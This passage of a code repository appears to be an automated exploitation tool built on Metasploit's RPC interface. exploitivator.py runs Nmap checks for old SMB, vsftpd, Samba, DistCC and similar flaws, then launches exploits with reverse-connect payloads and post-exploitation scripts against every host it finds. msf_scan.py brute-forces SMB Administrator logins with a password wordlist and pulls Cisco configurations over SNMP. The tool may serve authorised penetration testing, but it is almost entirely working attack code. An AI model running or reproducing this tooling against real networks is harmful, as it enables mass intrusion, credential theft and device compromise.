initialise(msf_pass): 38 | global msf_client 39 | global console_id 40 | global outfile 41 | 42 | # Initialize the MSF RPC client using pymetasploit3 43 | #msf_client = MsfRpcClient(msf_pass) 44 | msf_client = MsfRpcClient(msf_pass, server='127.0.0.1', port=55552) 45 | 46 | # Create a new console 47 | res = msf_client.consoles.console() 48 | console_id = res.cid 49 | print(f"res: {res}") 50 | 51 | # Connect to the database (optional, adjust if needed) 52 | msf_client.consoles.console(console_id).write(f"db_connect {msf_pass}@127.0.0.1/msf\n") 53 | time.sleep(1) 54 | 55 | 56 | # Function to exploit a target 57 | def exploit(rhost, lhost, lport, session, attack, payload, label): 58 | # Exploit the host 59 | commands = f"""use {attack} 60 | set PAYLOAD {payload} 61 | set RHOST {rhost} 62 | set LHOST {lhost} 63 | set LPORT {str(lport)} 64 | set ExitOnSession false 65 | exploit -z 66 | """ 67 | print(f"[+] Exploiting {label} on: {rhost}") 68 | print(f"[+] Exploit: {attack}") 69 | print(f"[+] Payload: {payload}") 70 | msf_client.consoles.console(console_id).write(commands) 71 | time.sleep(10) 72 | 73 | # Post-exploit 74 | runPost = f"""use post/multi/gather/run_console_rc_file 75 | set RESOURCE /tmp/smbpost.rc 76 | set SESSION {str(session)} 77 | exploit 78 | """ 79 | print(f"[+] Running post-exploit script on: {rhost}") 80 | msf_client.consoles.console(console_id).write(runPost) 81 | time.sleep(10) 82 | 83 | 84 | def parse_nmap_xml(xmlfile): 85 | # Parse the XML file from Nmap 86 | details = xmlfile.split(" ") 87 | filename = details[1] 88 | tree = ET.parse(filename) 89 | root = tree.getroot() 90 | 91 | results = {} 92 | target = "" 93 | state = "" 94 | 95 | for item in root.iter('host'): 96 | for child in item: 97 | if child.tag == 'address' and child.attrib['addrtype'] == 'ipv4': 98 | target = child.attrib['addr'] 99 | state = "" 100 | elif child.tag == 'hostscript': 101 | for subitem in child.iter('elem'): 102 | if 'key' in subitem.attrib: 103 | if subitem.attrib['key'] == 'state': 104 | state = subitem.text 105 | if target.strip() != "": 106 | results.update({target: state}) 107 | target = "" 108 | state = "" 109 | 110 | return results 111 | 112 | 113 | def parse_gnmap(nmapfile, grep_ex): 114 | details = nmapfile.split(" ") 115 | filename = details[1] 116 | results = {} 117 | 118 | # Read and process the GNMAP file 119 | cmd_line = f'cat {filename} | {grep_ex} | cut -d" " -f2 > temp.txt' 120 | os.system(cmd_line) 121 | 122 | # Safely attempt to open temp.txt, handling the case where it might not exist 123 | try: 124 | with open('temp.txt') as infile: 125 | vuln_hosts = infile.readlines() 126 | except FileNotFoundError: 127 | print("Error: temp.txt file not found. Ensure the GNMAP file is correctly processed.") 128 | return results 129 | 130 | # Process the contents of temp.txt 131 | for target in vuln_hosts: 132 | results.update({target.strip(): 'vulnerable'}) 133 | 134 | os.system('rm temp.txt') 135 | 136 | return results 137 | 138 | 139 | def main(): 140 | session = 1 141 | msf_pass = "abc123" 142 | lport = 4444 143 | sleep_time = 30 144 | wait_for_key = False 145 | 146 | # Command-line arguments 147 | parser = optparse.OptionParser(sys.argv[0] + ' -l lhost -p lport -f host_file -s session -m msf_pass') 148 | 149 | parser.add_option('-l', dest='lhost', type='string', help='Specify the IP address of the attacking machine') 150 | parser.add_option('-p', dest='lport', type='string', help='Specify a port to listen on') 151 | parser.add_option('-f', dest='host_file', type='string', help='Specify a file listing the remote hosts') 152 | parser.add_option('-s', dest='session', type='string', help='Specify a starting session ID') 153 | parser.add_option('-m', dest='msf_pass', type='string', help='Specify the password for the MSF instance') 154 | 155 | (options, args) = parser.parse_args() 156 | 157 | if options.msf_pass: 158 | msf_pass = options.msf_pass 159 | if options.session: 160 | session = int(options.session) 161 | if options.lport: 162 | lport = int(options.lport) 163 | 164 | host_file = options.host_file 165 | lhost = options.lhost 166 | 167 | if not host_file or not lhost: 168 | print("Usage: exploitivator.py -l -f [-p local_port -s -m ]") 169 | sys.exit(0) 170 | 171 | # Initialize the MSF session 172 | initialise(msf_pass) 173 | 174 | # Create an output log file 175 | outfile = open("exploitivator_output.txt", "w") 176 | outfile.write("MSF Attack Logs\n===============\n\n") 177 | 178 | # Nmap scans 179 | scan_file = "exploitivator_scan.cfg" 180 | config_file = "exploitivator.cfg" 181 | 182 | print(f"[*] Getting exploit requirements from file: {scan_file}") 183 | 184 | with open(scan_file) as infile: 185 | scans = [scan.strip() for scan in infile.readlines()] 186 | 187 | scan_settings = {} 188 | for scan in scans: 189 | items = scan.split("##") 190 | if len(items) < 3: 191 | print("[!] Bad scan config file entry!") 192 | sys.exit(2) 193 | scan_settings.update({items[0]: items[1:]}) 194 | 195 | print("[*] Beginning Nmap scans...") 196 | for details in scan_settings.values(): 197 | script_detail = details[0] 198 | script_outfile = details[1] 199 | cmd_line = f"nmap {script_detail} {script_outfile} -iL {host_file} &" 200 | print(f"Executing: {cmd_line}") 201 | os.system(cmd_line) 202 | 203 | time.sleep(sleep_time) 204 | 205 | with open(config_file) as infile: 206 | sploits = [sploit.strip() for sploit in infile.readlines()] 207 | 208 | sploit_settings = {} 209 | for sploit in sploits: 210 | items = sploit.split("##") 211 | if len(items) < 3: 212 | print(f"[!] Bad config file entry: {sploit}") 213 | sys.exit(2) 214 | sploit_settings.update({items[0]: items[1:]}) 215 | 216 | print("[*] Beginning exploitation attempts...") 217 | 218 | for attack in scan_settings: 219 | print(f"[*] Checking targets for {attack}\n") 220 | outfile.write("=========================================================\n") 221 | outfile.write(f"Vulnerability: {attack}\n") 222 | outfile.write("---------------------------------------------------------\n") 223 | 224 | script_outfile = scan_settings[attack][1] 225 | if script_outfile.endswith(".xml"): 226 | target_map = parse_nmap_xml(script_outfile) 227 | 228 | for target_host, state in target_map.items(): 229 | if state.lower() in ['vulnerable', 'likely vulnerable']: 230 | print(f"[*] Attempting to exploit: {target_host}") 231 | outfile.write(f"Target: {target_host}\n") 232 | outfile.write(f"Session: {str(session)}\n") 233 | 234 | exploit(target_host, lhost, lport, session, sploit_settings[attack][0], sploit_settings[attack][1], attack) 235 | lport += 1 236 | session += 1 237 | 238 | elif script_outfile.endswith(".gnmap"): 239 | target_map = parse_gnmap(script_outfile, scan_settings[attack][2]) 240 | 241 | for target_host, state in target_map.items(): 242 | print(f"[*] Attempting to exploit: {target_host}") 243 | outfile.write(f"Target: {target_host}\n") 244 | outfile.write(f"Session: {str(session)}\n") 245 | 246 | exploit(target_host, lhost, lport, session, sploit_settings[attack][0], sploit_settings[attack][1], attack) 247 | lport += 1 248 | session += 1 249 | 250 | print("[*] Finished!") 251 | outfile.close() 252 | 253 | 254 | if __name__ == "__main__": 255 | main() 256 | -------------------------------------------------------------------------------- /exploitivator_scan.cfg: -------------------------------------------------------------------------------- 1 | SMB_06-025##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms06-025.nse##-oX smb_06_025.xml 2 | SMB_07-029##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms07-029.nse##-oX smb_07_029.xml 3 | SMB_08-067##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms08-067.nse##-oX ms_08_067.xml 4 | SMB_09-050##-p U:137,U:139,T:139,T:445 --script smb-vuln-cve2009-3103.nse##-oX ms_09_050.xml 5 | SMB_10-054##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-054.nse##-oX ms_10_054.xml 6 | SMB_10-061##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms10-061.nse##-oX ms_10_061.xml 7 | SMB_17-010##-p U:137,U:139,T:139,T:445 --script smb-vuln-ms17-010##-oX ms_17_010.xml 8 | DistCC##-p 3632 -sSV##-oG distcc.gnmap##grep "3632\/open\/tcp\/\/distccd" 9 | JavaRMI##-p 1099 -sSV##-oG javarmi.gnmap##grep "1099\/open\/tcp\/\/rmi 10 | VSFTPBackDoor##-p 21 -sSV##-oG vsftp_backdoor.gnmap##egrep "vsftpd 2.3.4|vsftpd 2.0.8 or later" 11 | Asterisk##-p 5038 -sSV##-oG asterisk.gnmap##grep "Asterisk Call Manager 1.1" 12 | URTBackDoor##-p 6667 -sSV##-oG urt_backdoor.gnmap##grep "6667\/open\/tcp\/\/irc\/\/Unreal" 13 | SambaRCE##-p 139,445 --script=smb-vuln-cve-2007-2447##-oX samba_rce.xml 14 | -------------------------------------------------------------------------------- /msf_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import sys 3 | from time import sleep 4 | import socket 5 | from pymetasploit3.msfrpc import MsfRpcClient 6 | 7 | # Define global variables 8 | console_id = None 9 | outfile = None 10 | client = None 11 | 12 | def initialise(username, msf_pass): 13 | global client 14 | global console_id 15 | 16 | # Initialize the Metasploit RPC client 17 | #client = MsfRpcClient(msf_pass, ssl=True) 18 | #client = MsfRpcClient('abc123', server='127.0.0.1', port=55552) # Replace 'abc123' with your actual RPC password 19 | client = MsfRpcClient(msf_pass, server='127.0.0.1', port=55552) 20 | 21 | # Create a new console 22 | console = client.consoles.console() 23 | console_id = console.cid 24 | print(f"Console created: {console_id}") 25 | 26 | # Connect to the database 27 | console.write(f"db_connect {username}:{msf_pass}@127.0.0.1/msf\n") 28 | sleep(1) 29 | 30 | def run_scan(scan_name, host_file): 31 | global client 32 | global console_id 33 | global outfile 34 | 35 | console = client.consoles.console(console_id) 36 | 37 | # Create a workspace and set the threads 38 | console.write("workspace -a msf_scanner\n") 39 | sleep(1) 40 | console.write("set THREADS 10\n") 41 | sleep(1) 42 | console.write("workspace msf_scanner\n") 43 | sleep(1) 44 | console.write(f"use {scan_name}\n") 45 | sleep(1) 46 | 47 | # Check for specific scan settings 48 | if scan_name == "auxiliary/scanner/smb/smb_login": 49 | set_smb_login() 50 | elif scan_name == "auxiliary/scanner/postgres/postgres_login": 51 | console.write("set RPORT 5432\n") 52 | sleep(1) 53 | elif scan_name == "auxiliary/scanner/snmp/cisco_config_tftp": 54 | set_snmp_config() 55 | 56 | # Set target hosts 57 | console.write(f"set RHOSTS file:{host_file}\n") 58 | sleep(1) 59 | 60 | # Run the scan 61 | console.write("run\n") 62 | sleep(5) 63 | 64 | # Monitor console output 65 | while True: 66 | res = console.read() 67 | if res['data']: 68 | print(res['data'], end='') 69 | outfile.write(res['data']) 70 | 71 | if res['busy']: 72 | sleep(1) 73 | continue 74 | break 75 | 76 | def set_smb_login(): 77 | global console_id 78 | console = client.consoles.console(console_id) 79 | console.write("set SMBDomain WORKGROUP\n") 80 | sleep(1) 81 | console.write("set BLANK_PASSWORDS true\n") 82 | sleep(1) 83 | console.write("set USER_AS_PASS true\n") 84 | sleep(1) 85 | console.write("set SMBUser Administrator\n") 86 | sleep(1) 87 | console.write("set PASS_FILE /usr/share/wordlists/fasttrack.txt\n") 88 | sleep(1) 89 | 90 | def set_snmp_config(): 91 | global console_id 92 | console = client.consoles.console(console_id) 93 | 94 | # Find the local IP address 95 | lhost = ([l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] 96 | if not ip.startswith("127.")][:1], 97 | [[(s.connect(('8.8.8.8', 53)), s.getsockname()[0], s.close()) 98 | for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) if l][0][0]) 99 | 100 | console.write(f"set LHOST {lhost}\n") 101 | sleep(1) 102 | console.write("set COMMUNITY private\n") 103 | sleep(1) 104 | 105 | def close_scanner(): 106 | global console_id 107 | global outfile 108 | 109 | # Destroy the console session 110 | console = client.consoles.console(console_id) 111 | console.destroy() 112 | print("Console destroyed.") 113 | outfile.write("Console destroyed.\n") 114 | 115 | def main(): 116 | global outfile 117 | 118 | if len(sys.argv) < 2: 119 | print("Usage: msf_scan.py [username] [password]") 120 | sys.exit(0) 121 | 122 | host_file = sys.argv[1] 123 | config_file = "scan_types.cfg" 124 | 125 | # Load scan types from the configuration file 126 | with open(config_file) as infile: 127 | scans = infile.readlines() 128 | 129 | scans = [scan_name.strip() for scan_name in scans] 130 | 131 | if not scans: 132 | print("Scan config file is empty!") 133 | sys.exit(0) 134 | 135 | # Check if username and password are provided 136 | if len(sys.argv) == 4: 137 | username = sys.argv[2] 138 | msf_pass = sys.argv[3] 139 | else: 140 | username = "msf" 141 | msf_pass = "abc123" 142 | 143 | # Open output file 144 | outfile = open("msf_scan_output.txt", "w") 145 | 146 | outfile.write("MSF Scanning Output\n") 147 | outfile.write("===================\n\n") 148 | 149 | # Initialize Metasploit 150 | initialise(username, msf_pass) 151 | 152 | # Run each scan from the config file 153 | for scan_path in scans: 154 | if not scan_path.startswith("#"): 155 | print(f"Scan name: {scan_path}") 156 | outfile.write(f"Scan name: {scan_path}\n") 157 | outfile.write("---------------------------------------------------------------------------------\n") 158 | run_scan(scan_path, host_file) 159 | outfile.write("---------------------------------------------------------------------------------\n") 160 | 161 | # Close and cleanup 162 | close_scanner() 163 | print("Finished!") 164 | outfile.close() 165 | 166 | if __name__ == "__main__": 167 | main() 168 | -------------------------------------------------------------------------------- /scan_types.cfg: -------------------------------------------------------------------------------- 1 | auxiliary/scanner/dcerpc/endpoint_mapper 2 | auxiliary/scanner/smb/smb_version 3 | auxiliary/scanner/x11/open_x11 4 | auxiliary/scanner/discovery/ipv6_multicast_ping 5 | auxiliary/scanner/discovery/ipv6_neighbor 6 | auxiliary/scanner/smb/smb_login 7 | --------------------------------------------------------------------------------